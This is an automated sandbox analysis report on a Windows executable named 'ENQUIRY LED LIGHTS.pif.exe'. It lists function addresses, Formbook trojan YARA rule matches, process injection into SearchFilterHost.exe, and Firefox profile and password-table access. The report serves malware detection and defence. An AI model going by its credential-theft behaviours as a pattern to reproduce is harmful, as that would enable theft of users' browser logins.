            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2B1B03_2_02F2B1B0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0F1723_2_02F0F172
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FEB16B3_2_02FEB16B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F5516C3_2_02F5516C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FD16CC3_2_02FD16CC
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FDF7B03_2_02FDF7B0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F114603_2_02F11460
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FDF43F3_2_02FDF43F
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBD5B03_2_02FBD5B0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FD75713_2_02FD7571
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FCDAC63_2_02FCDAC6
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F65AA03_2_02F65AA0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBDAAC3_2_02FBDAAC
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC1AA33_2_02FC1AA3
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F93A6C3_2_02F93A6C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FDFA493_2_02FDFA49
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FD7A463_2_02FD7A46
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F95BF03_2_02F95BF0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F5DBF93_2_02F5DBF9
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3FB803_2_02F3FB80
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FDFB763_2_02FDFB76
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F238E03_2_02F238E0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8D8003_2_02F8D800
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F299503_2_02F29950
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3B9503_2_02F3B950
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB59103_2_02FB5910
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F29EB03_2_02F29EB0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FDFFB13_2_02FDFFB1
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F21F923_2_02F21F92
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FDFF093_2_02FDFF09
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FDFCF23_2_02FDFCF2
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F99C323_2_02F99C32
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3FDC03_2_02F3FDC0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FD7D733_2_02FD7D73
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FD1D5A3_2_02FD1D5A
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F23D403_2_02F23D40
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_04154D197_2_04154D19
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_04152D997_2_04152D99
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_041738A97_2_041738A9
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_0415D2097_2_0415D209
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_04154AF97_2_04154AF9
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_0415B3F47_2_0415B3F4
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_0415B3F97_2_0415B3F9
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051805358_2_05180535
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_052405918_2_05240591
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_052244208_2_05224420
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_052324468_2_05232446
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0522E4F68_2_0522E4F6
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051A47508_2_051A4750
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051807708_2_05180770
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0517C7C08_2_0517C7C0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0519C6E08_2_0519C6E0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051701008_2_05170100
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0521A1188_2_0521A118
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_052081588_2_05208158
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_052341A28_2_052341A2
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_052401AA8_2_052401AA
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_052381CC8_2_052381CC
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_052120008_2_05212000
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0523A3528_2_0523A352
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_052403E68_2_052403E6
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0518E3F08_2_0518E3F0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_052202748_2_05220274
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_052002C08_2_052002C0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0518AD008_2_0518AD00
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0521CD1F8_2_0521CD1F
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_05198DBF8_2_05198DBF
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0517ADE08_2_0517ADE0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_05180C008_2_05180C00
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_05220CB58_2_05220CB5
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_05170CF28_2_05170CF2
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_05222F308_2_05222F30
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051A0F308_2_051A0F30
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051C2F288_2_051C2F28
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051F4F408_2_051F4F40
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051FEFA08_2_051FEFA0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_05172FC88_2_05172FC8
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0523EE268_2_0523EE26
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_05180E598_2_05180E59
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_05192E908_2_05192E90
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0523CE938_2_0523CE93
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0523EEDB8_2_0523EEDB
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051969628_2_05196962
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0524A9A68_2_0524A9A6
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051829A08_2_051829A0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0518A8408_2_0518A840
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051828408_2_05182840
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051668B88_2_051668B8
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051AE8F08_2_051AE8F0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0523AB408_2_0523AB40
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_05236BD78_2_05236BD7
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0517EA808_2_0517EA80
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_052375718_2_05237571
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0521D5B08_2_0521D5B0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_052495C38_2_052495C3
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0523F43F8_2_0523F43F
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051714608_2_05171460
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0523F7B08_2_0523F7B0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051C56308_2_051C5630
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_052316CC8_2_052316CC
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0524B16B8_2_0524B16B
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0516F1728_2_0516F172
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051B516C8_2_051B516C
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0518B1B08_2_0518B1B0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0523F0E08_2_0523F0E0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_052370E98_2_052370E9
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051870C08_2_051870C0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0522F0CC8_2_0522F0CC
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0523132D8_2_0523132D
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0516D34C8_2_0516D34C
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051C739A8_2_051C739A
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051852A08_2_051852A0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_052212ED8_2_052212ED
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0519B2C08_2_0519B2C0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0519D2F08_2_0519D2F0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_05237D738_2_05237D73
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_05183D408_2_05183D40
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_05231D5A8_2_05231D5A
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0519FDC08_2_0519FDC0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051F9C328_2_051F9C32
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0523FCF28_2_0523FCF2
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0523FF098_2_0523FF09
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_05181F928_2_05181F92
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0523FFB18_2_0523FFB1
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_05143FD58_2_05143FD5
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_05143FD28_2_05143FD2
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_05189EB08_2_05189EB0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_052159108_2_05215910
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051899508_2_05189950
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0519B9508_2_0519B950
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051ED8008_2_051ED800
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051838E08_2_051838E0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0523FB768_2_0523FB76
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0519FB808_2_0519FB80
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051BDBF98_2_051BDBF9
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051F5BF08_2_051F5BF0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_05237A468_2_05237A46
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0523FA498_2_0523FA49
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051F3A6C8_2_051F3A6C
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_05221AA38_2_05221AA3
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0521DAAC8_2_0521DAAC
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_051C5AA08_2_051C5AA0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0522DAC68_2_0522DAC6
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_032A1AD08_2_032A1AD0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0329CA808_2_0329CA80
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0329AD208_2_0329AD20
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0329CCA08_2_0329CCA0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_032A337B8_2_032A337B
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_032A33808_2_032A3380
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_032A51908_2_032A5190
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_032BB8308_2_032BB830
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0549E4838_2_0549E483
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0549E3688_2_0549E368
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0549E8228_2_0549E822
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0549D8888_2_0549D888
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_0549CB238_2_0549CB23
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: String function: 02F55130 appears 58 times
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: String function: 02F0B970 appears 262 times
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: String function: 02F8EA12 appears 86 times
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: String function: 02F67E54 appears 99 times
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: String function: 02F9F290 appears 103 times
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: String function: 051EEA12 appears 86 times
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: String function: 0516B970 appears 262 times
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: String function: 051FF290 appears 103 times
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: String function: 051C7E54 appears 107 times
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: String function: 051B5130 appears 58 times
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1742324403.0000000009B80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs ENQUIRY LED LIGHTS.pif.exe
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1731368174.000000000098E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ENQUIRY LED LIGHTS.pif.exe
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000000.1704551921.0000000000388000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameYRoZ.exe" vs ENQUIRY LED LIGHTS.pif.exe
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000003.00000002.2069312956.000000000300D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ENQUIRY LED LIGHTS.pif.exe
            Source: ENQUIRY LED LIGHTS.pif.exeBinary or memory string: OriginalFilenameYRoZ.exe" vs ENQUIRY LED LIGHTS.pif.exe
            Source: ENQUIRY LED LIGHTS.pif.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.2977288553.0000000002680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.2977216188.0000000005040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.2977133044.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2071235910.0000000004630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2069154376.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: ENQUIRY LED LIGHTS.pif.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.9b80000.6.raw.unpack, P9I1LQRf00da55U6ir.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.9b80000.6.raw.unpack, P9I1LQRf00da55U6ir.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.9b80000.6.raw.unpack, P9I1LQRf00da55U6ir.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, P9I1LQRf00da55U6ir.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, P9I1LQRf00da55U6ir.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, P9I1LQRf00da55U6ir.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4193c28.4.raw.unpack, zCdZB2IyVxidTBWpWC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.9b80000.6.raw.unpack, zCdZB2IyVxidTBWpWC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4193c28.4.raw.unpack, P9I1LQRf00da55U6ir.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4193c28.4.raw.unpack, P9I1LQRf00da55U6ir.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4193c28.4.raw.unpack, P9I1LQRf00da55U6ir.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, zCdZB2IyVxidTBWpWC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@6/4
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ENQUIRY LED LIGHTS.pif.exe.logJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeFile created: C:\Users\user\AppData\Local\Temp\34R62IL6Jump to behavior
            Source: ENQUIRY LED LIGHTS.pif.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: ENQUIRY LED LIGHTS.pif.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: SearchFilterHost.exe, 00000008.00000003.2402682068.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000002.2975886564.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000003.2401755636.0000000003497000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: ENQUIRY LED LIGHTS.pif.exeReversingLabs: Detection: 26%
